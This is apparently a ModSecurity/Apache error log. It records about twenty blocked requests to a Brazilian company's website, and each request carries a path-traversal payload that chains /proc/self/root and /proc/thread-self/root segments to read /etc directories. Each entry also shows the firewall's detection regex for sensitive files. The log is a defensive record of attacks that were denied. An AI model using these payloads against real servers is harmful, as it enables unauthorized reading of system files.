[Wed Mar 18 11:59:30.451272 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:57736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq90eyqAr6etmhZHNrQKwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:31.989827 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:49666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq909a6ubjKNq_cu4aogwAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:33.328810 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:49680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq91cdf6f5d65gmYZThTwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:34.635149 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:49690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq91sdf6f5d65gmYZThUAAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:35.986916 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:49694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq91-oXxyEfFpUF8f96MAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:39.607582 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:49696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq92wkwaGbbGflqUZAcVAAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:43.228674 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:51054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq93uoXxyEfFpUF8f96MwAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:44.647821 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:51060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq94Pu8EFLIOrSqIpsQPwAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:48.667019 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:51072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq95OyqAr6etmhZHNrQQgAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:49.987351 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:36330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq95cdf6f5d65gmYZThcQAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:51.328710 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:36340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq959Y0UrI5A3LftIy8MgAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:52.675420 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:36354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq96Na6ubjKNq_cu4aoiwAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:53.985898 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:36356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq96da6ubjKNq_cu4aojAAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:54.832921 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:39310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq96uyqAr6etmhZHNrQSAAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:59:55.291452 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:36358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq96ymAPhZkrhU8w4l5yAAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:56.575397 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:36368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq97Ow_le52K8_3pV3r-wAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:57.942154 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:36384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq97eyqAr6etmhZHNrQSgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:59:59.291239 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:36394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq97-w_le52K8_3pV3sAAAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:00.639879 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:57898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq98Mdf6f5d65gmYZThfAAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:00.932394 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:41700] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq98Na6ubjKNq_cu4aokwAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:00:07.485165 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:57914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq99-yqAr6etmhZHNrQUwAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
